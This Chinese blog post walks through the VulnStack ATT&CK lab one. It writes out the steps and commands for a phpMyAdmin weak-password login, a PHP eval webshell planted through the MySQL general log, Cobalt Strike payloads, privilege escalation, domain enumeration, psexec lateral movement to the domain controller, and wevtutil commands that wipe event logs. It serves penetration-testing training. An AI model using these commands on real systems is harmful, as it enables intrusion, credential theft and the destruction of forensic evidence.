首页 > 编程语言 >【渗透测试】ATT&CK靶场一,phpmyadmin,域渗透,内网横向移动攻略

【渗透测试】ATT&CK靶场一,phpmyadmin,域渗透,内网横向移动攻略

时间:2024-09-18 15:17:45浏览次数:10  
标签:CK phpmyadmin shell cl 渗透 主机 日志 net

前言

VulnStack,作为红日安全团队匠心打造的知识平台,其独特优势在于全面模拟了国内企业的实际业务场景,涵盖了CMS、漏洞管理及域管理等核心要素。这一设计理念源于红日安全团队对ATT&CK红队评估设计模式的深刻理解和巧妙应用。靶场环境的构建与题目设计均围绕环境搭建、漏洞利用、内网信息搜集、横向移动、渗透通道构建、持久控制及痕迹清理等多维度展开,旨在为安全研究者打造一个真实且全面的内网渗透学习环境。如果哪里出错了,还请师傅们指出,内容仅供参考,不喜勿喷,感谢。

image-20240821152514635

环境准备

下载链接:http://vulnstack.qiyuanxuetang.net/vuln/detail/2/

红日一的靶机一共有三台机器

image-20240825180544741

网络拓扑结构

image-20240826203050580

首先修改虚拟网络编辑器为仅主机的网卡为52段

image-20240825181906416

win7外网主机添加一块网卡,用于模拟公网服务器

image-20240825180340463

启动后配置本地连接为自动获取ip,它默认设的静态不是我们的主机net模式,就无法上网,甚至访问不了主机

image-20240825190253174

win2008为域控主机,配置如下,将net模式修改为仅主机

image-20240825185419014

win2003为域成员

image-20240825185346961

启动环境

登录密码:hongrisec@2019,三台密码都是一样的,如果登录后要你重新修改密码,那么三台机器都是你修改之后的密码,账户名都为Administrator

win7启动web服务即可开始渗透了

image-20240825182955011

信息收集

发现主机129

image-20240825190730900

再对他进行nmap端口扫描,发现端口80和3306开放的mysql端口

image-20240825204056292

访问靶机地址,里面包含了系统的phpstudy网站的绝对路径和管理员邮箱,还有远程文件包含函数的打开

image-20240825205800234

下滑还发现一个mysql检测

image-20240825204600941

默认弱口令root/root,即可测试登录成功

image-20240825204507622

我们用kali自带的目录扫描器dirb,扫到如下内容

dirb http://192.168.209.129/

image-20240825205221559

一个一个访问寻找可用的信息,phpinfo.php,php版本5.4.45

image-20240825205250250

还有一个phpmyadmin,用刚刚的弱口令登陆即可

image-20240825205929192

web渗透

进入后台,发现mysql不允许向外部写文件,没有拿到系统权限之前我们也修改不了这个文件写入的路径

show variables like "secure%";

image-20240825210448226

那么就用第二种方式,日志写入

show variables like "%general%";

image-20240825210959778

我们用的是root账户属于DBA用户,这个时候我们就能直接修改日志路径为当前网站的根目录,并创建一个shell.php,写入一句话木马,注意,这里的写入实际上写的是日志文件,而不是向外部写文件,所以不需要secure_file_priv的参数为" "

set global general_log="on";
set global general_log_file="C:/phpStudy/WWW/shell.php";

image-20240825211343019

image-20240825211810962

向日志写入一句话木马,就可以上线成功

select "<?php @eval($_POST[10]); ?>";

image-20240825212007099

访问日志shell.php

image-20240825212029722蚁剑连接

image-20240825212513078

cs生成木马

image-20240826095022977

上传木马

image-20240826095002637

执行木马即可上线

image-20240826095357984

关闭防火墙,在这里关不关都无所谓

shell netsh advfirewall set allprofiles state off 

image-20240826102218271

权限提升

查看权限信息,是超级管理员

getuid

image-20240826102326253

权限提升

image-20240826175423707

选择监听模块为你kali服务器地址

image-20240826102730859

一个个尝试,选项xvc-exe提权

image-20240826102718739

提权到系统权限成功

image-20240826102807476

内网信息收集

查看ip地址

shell ipconfig

image-20240826101605862

显示所有系统用户

shell net user

image-20240826104041192

列举计算机名

shell net view

image-20240826104117216

判断是否存在域

shell net config Workstation

image-20240826104150641

查看有几个域,结果为GOD一个

shell net view 	/domain

image-20240826104223609

利用跳板机进行端口扫描

image-20240826104343788

指定为该主机的另一个网卡,可以使用arp扫描也可以使用icmp扫描

image-20240826104404290

发现两台主机

image-20240826104735899

且都开放了445端口

image-20240826105845825

抓取明文密码

image-20240826104857388

内网横向

刚刚我们端口扫描的时候发现开放了445端口,可以创建SMB监听隧道(Windows上的SMB(Server Message Block)协议是一种网络文件共享协议,它允许用户在网络上的计算机之间访问文件和打印机等资源。)

新建监听器

image-20240826110021520

image-20240826110218245

以列表形式展示目标

image-20240826110735862

找到刚刚扫描出来的域控主机,进行横向移动,选择psexec选项

image-20240826110820766

配置如下

image-20240826110922975

这时候就可以拿到域控服务器

image-20240826111327199

另外一台内网主机也是这样,因为他们都处于同域下

image-20240826140657871

清除日志,注意,多执行几次,有些时候可能清理不干净

shell wevtutil cl security    //清理安全日志
shell wevtutil cl system        //清理系统日志
shell wevtutil cl application        //清理应用程序日志
shell wevtutil cl "windows powershell"    //清除power shell日志
shell wevtutil cl Setup     //清除(cl)事件日志中的 "Setup" 事件。

image-20240826173556830

或者直接使用插件

image-20240826173733111

image-20240826173747058

网络拓扑图已全部是上线

image-20240826183227480

总结

我成功上线了3台靶机,hhhhhhh,师傅们点点赞,蟹蟹

202408262019441 (1)

感今怀昔

最新可用,bp+charles小程序抓包教程

【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS

内网渗透利器,Cobal_Strike汉化使用指南

DC-2综合渗透,rbash逃逸,git提权,wordpress靶场渗透教程

【渗透测试】12种rbash逃逸方式总结

标签:CK,phpmyadmin,shell,cl,渗透,主机,日志,net
From: https://www.cnblogs.com/xiaoyus/p/18418545

相关文章

  • 【渗透测试】rbash逃逸的12种方式
    简述什么是rbash?rbash(Therestrictedmodeofbash),也就是限制型bash;是平时所谓的restrictedshell的一种,也就是最常见的restrictedshell,它与一般shell的区别在于会限制一些行为,让一些命令无法执行如何设置?useradd-s/bin/rbashtest#设置用户test登陆的shell为rbashmkdir......
  • 【内网渗透】ICMP隧道技术,ICMP封装穿透防火墙上线MSF/CS
    前言博客主页:h0ack1r丶羽~从0到1~渗透测试中,如果攻击者使用各类上层隧道(例如:HTTP隧道、DNS隧道、常规正/反向端口转发等)进行的操作都失败了,常常会通过ping命令访问远程计算机,尝试建立ICMP隧道,将TCP/UDP数据封装到ICMP的ping数据包中,本文主要讲解了【靶机能上TCP和不能上TCP的......
  • [Clickhouse] Clickhouse 函数 : 数据类型转换
    0引言如无特殊说明,ck版本为21.3.4.251数据类型的支持情况查看当前受支持的数据类型select*fromsystem.data_type_families--selectname,case_insensitive,alias_tofromsystem.data_type_families;outputname|case_insensitive......
  • 【内网渗透】免工具,内网和域内信息收集的40种方式总结
    前言本文主要演示了【系统信息收集】【浏览器信息收集】和【域内信息收集】,因为上一篇已经讲过了基本的信息收集方式:这篇新增了域内信息收集和浏览器信息收集,并且在上一篇文章的基础下,新增了好几种内网信息收集的方式,这里先介绍域内信息收集域内信息查看当前登录域显示和更改......
  • 【渗透测试】内网信息收集的十三种基本方式
    本文的主题为基本的信息收集方式,不包含域内信息收集,域内信息收集得再过几天看看,用的windowsserver2019内核版本比较高,还有一些信息收集技巧行不通,比如检查杀毒软件情况,就不举例了一些工具准备mimikatz:https://github.com/ParrotSec/mimikatzProcDump:https://learn.microsoft......
  • docker 将进程内的文件复制到物理机路径
     在实际开发过程中,经常遇到使用docker部署数据库时  很多同学未将容器的路径跟服务器路径做一个映射,从而会导致很多问题出现,因此做个记录1.使用dockerps命令可以获取docker容器中所有正在运行的容器,如下图所示 2.运行 dockerexec-it8236262ad053/bin/bash  ......
  • Docker-compose安装MySQL8.0.39
    编写DockerfileFROMmysql:8.0.39ENVTZ=Asia/ShanghaiRUNln-sf/usr/share/zoneinfo/$TZ/etc/localtime&&echo$TZ>/etc/timezone编写docker-compose.yml,与Dockerfile在同目录中services:db:build:context:./image:mysql:8.0.39......
  • docker配置镜像加速器
    1.一键设置镜像加速:修改文件/etc/docker/daemon.json(如果不存在则创建)vi/etc/docker/daemon.json2.修改JSON文件更改为以下内容然后保存{"registry-mirrors":["https://docker.registry.cyou","https://docker-cf.registry.cyou","https://dockercf......
  • Docker拉取镜像报错:failed to register layer: exit status 22: unpigz: abort: zlib
    今天在甲方的服务器上升级Docker容器时拉取镜像报错failedtoregisterlayer:exitstatus22:unpigz:abort:zlibversionlessthan1.2.3,很纳闷明明在阿里云上测试的时候没有这个问题来着,遂开始查资料发现是pigz的bug,将其升级即可重写拉取镜像运行操作步骤:安装新版本c......
  • Docker安装MySQL8.0.39报错:Fatal glibc error: CPU does not support x86-64-v2
    用Docker升级MySQL时报错Fatalglibcerror:CPUdoesnotsupportx86-64-v2,在网上找了很久资料,发现是MySQL的新镜像使用的是OracleLinux9,当前服务器的CPU无法安装这个所以报错,解决方法就是更换镜像版本这是我的解决方案,基于Dockerfile生成镜像:FROMm.daocloud.io/docker.......